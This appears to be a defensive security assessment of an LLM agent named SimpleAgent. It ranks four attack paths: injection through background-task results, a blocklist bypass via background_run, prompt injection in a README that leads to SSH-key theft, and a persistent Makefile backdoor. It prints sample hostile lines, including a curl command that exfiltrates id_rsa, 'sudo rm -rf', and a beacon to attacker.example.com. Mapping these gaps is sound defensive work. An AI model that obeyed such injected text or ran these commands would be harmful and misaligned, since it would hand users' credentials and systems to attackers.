SimpleAgent · Top Attack Paths

RiskScore 排名总览

AP-SIM-01后台输出注入

AttackerHTTPEndpoint → background_run curl → <bg-results> → write_file

11.34

AP-SIM-02策略绕过执行

background_run 无检查 → 任意 shell

11.24

AP-SIM-03文件读取外泄

恶意文件 → read_file → bash curl 外泄

6.96

AP-SIM-04持久化后门

注入 → write_file → 跨会话后门

5.10

攻击路径详情

AP-SIM-01 · Background Task Output Injection → File Backdoor 后台任务输出注入 → 工作目录文件写入后门

11.34

RiskScore

extended-clean 难度 0.6 INN-01 SC-GAP-BGRESULT-INJECT ORP-SIM-01

AttackerHTTPEndpointResponse
PoisoningEntry · external_service_response

→

T-AUTO × 1.5
自动注入

→

<background-results> slot
s08:191-196

→

write_file("run.sh")
SK-PERSIST

→

bash("chmod +x && ./run.sh")
SK-EXEC

→

CodeExecution
WORKDIR 后门

难度分 (D)

0.6

精-1 先-1 感-1 诱-1

Source + Sink

4.50 + 3.84

REG×T-AUTO / 危0.8×影0.8

Novelty

Breakthrough+2 Rarity+1

UI-TASK_EXECUTE → SI-PERSIST_CODE → AI-PERSISTENCE 伪装成后台数据获取 → 注入工具调用 → 持久化后门

关键漏洞代码

s08:191notifs = BG.drain_notifications()
s08:195messages.append({"role": "user",
s08:196 "content": f"<background-results>\n{notif_text}\n</background-results>"})

⚑ 内部独有发现 + ORP-SIM-01

AP-SIM-01 的 PoisoningEntry 是攻击者控制的外部 HTTP 服务端点响应体（AttackerHTTPEndpointResponse），entry_type: external_service_response（ORP-SIM-01A 待收录）。T-AUTO=1.5 捕获异步自动注入特征；delivery_channel: async_bg_notification（ORP-SIM-01B 待收录）描述通知队列通道机制。外部文献中无此 async endpoint response → bg-notification-queue 变体的专项分析。

安全机制	覆盖状态	说明
<background-results> 过滤	❌ 完全缺失（SC-GAP）	无任何 SecurityChecker
dangerous_blocklist	⚠️ 部分	chmod/./run.sh 不在 5 项列表中
safe_path	✅ 有效	阻止写出 WORKDIR，但后门在 WORKDIR 内部

AP-SIM-02 · background_run Security Policy Bypass → Unrestricted Shell background_run 安全策略绕过 → 无限制命令执行

11.24

RiskScore

native 难度 0.7 INN-02 SC-GAP-BGRUN-NO-CHECK

REPLSessionInput
PoisoningEntry · user_comment

→

messages(role="user")
s08:220

→

LLM 选用 background_run
非 bash（绕过检查）

→

background_run("sudo rm -rf ...")
SK-EXEC · 无检查

→

UnrestrictedExecution
CRITICAL

难度分 (D)

0.7

精-1 先-1 感-1

Source + Sink

4.20 + 5.04

REG×T-ANY / 危0.9×影0.8

Novelty

Breakthrough+1 Rarity+1

UI-TASK_EXECUTE → SI-EXEC_INJECT → AI-EXECUTION 伪装长任务 → 无检查路径执行危险命令 → 任意代码执行

双通道对比（安全错觉）

bashif any(d in command for d in dangerous): return "Blocked"
bg_runsubprocess.run(command, shell=True) # 无检查

⚑ 内部独有发现

dangerous_blocklist 仅在 bash 工具中实现，背后产生"安全错觉"——开发者或用户误以为危险命令全局被拦截。该双执行路径不对称在公开安全文献中无直接对应案例。与 Trail of Bits RCE（Oct 2025）argument injection 类似但机制独立。

安全机制	覆盖状态	说明
dangerous_blocklist	❌ 被绕过（SC-GAP）	仅在 run_bash() 实现，background_run._execute() 无检查
safe_path	❌ 不适用	仅检查文件路径，不检查命令字符串
timeout=300s	⚠️ 防 DoS	300s 内可完成绝大多数攻击，不属于安全防护

AP-SIM-03 · Malicious File Read → Prompt Injection → Credential Exfiltration 读取恶意文件 → 提示词注入 → 凭证外泄

6.96

RiskScore

extended-clean 难度 0.6 SC-GAP-SAFEPATH-PARTIAL

MaliciousLocalFile
PoisoningEntry · public_repo

→

read_file("README.md")
tool_call_result

→

注释注入

→

bash("cat ~/.ssh/id_rsa | base64 | curl POST ...")
SK-NET

→

CredentialExfiltration
SSH Key / API Key

难度分 (D)

0.6

精-1 先-1 感-1 诱-1

Source + Sink

3.60 + 3.36

REG×T-ANY / 危0.8×影0.7

Novelty

标准 Indirect Injection

UI-QUERY_INFO → SI-EXFIL_MCP → AI-EXFILTRATION 伪装代码审查 → 读取恶意文件 → curl 外泄凭证

文件注入 Payload 示例

安全机制	覆盖状态	说明
safe_path	❌ 不适用	防路径穿越，不过滤文件内容
dangerous_blocklist	❌ 不覆盖	curl / cat / base64 均不在 5 项列表

AP-SIM-04 · Prompt Injection → write_file → Cross-Session Persistence 提示词注入 → 写入文件 → 跨会话持久化

5.10

RiskScore

native 难度 0.5 SC-GAP-SAFEPATH-PARTIAL

继承先导AP实体
PoisoningEntry（AP-SIM-01/03）

→

先导注入上下文
Source（继承）

→

write_file("Makefile", poisoned)
SK-PERSIST

→

跨会话后门
FilePersistence

难度分 (D)

0.5

精-1 先-1 感-2 诱-1

Source + Sink

3.00 + 2.10

REG×T-ANY / 危0.7×影0.6

Novelty

标准文件持久化

UI-CODE_ASSIST → SI-PERSIST_CODE → AI-PERSISTENCE 伪装项目文件编辑 → 写入含 beacon 的 Makefile → 供应链扩散

跨会话持久化场景

write_file("Makefile", "all:\n\tcurl http://attacker.example.com/beacon\n\t$(ORIG_TARGET)")
→ 用户 make build → 触发 beacon → git add Makefile → 供应链污染

安全机制	覆盖状态	说明
safe_path	✅ 路径	防写出 WORKDIR，但 Makefile 在 WORKDIR 内部合法
dangerous_blocklist	❌ 不适用	检查命令字符串，不检查写入文件内容

关键发现摘要

内部独有发现 #1 · INN-01 + ORP-SIM-01

INN-01 关键创新点重述：PoisoningEntry 实体为外部 HTTP 服务端点响应（external_service_response），通过 background_run → curl 可达；delivery_channel = async_bg_notification（通知队列异步 drain）是区别于同步 tool_result 的核心特征，配合 T-AUTO=1.5 使攻击无需额外触发。ORP-SIM-01 已修订为双扩展提案（entry_type + delivery_channel 属性）。

内部独有发现 #2 · INN-02

双执行通道安全不对称：bash 有 dangerous_blocklist（5 项），background_run 完全无检查。dangerous_blocklist 的存在制造了"安全错觉"，用户和开发者可能误认为危险命令被全局拦截。这是一种典型的"安全机制可见性误导"。

SimpleAgent · 攻击路径排名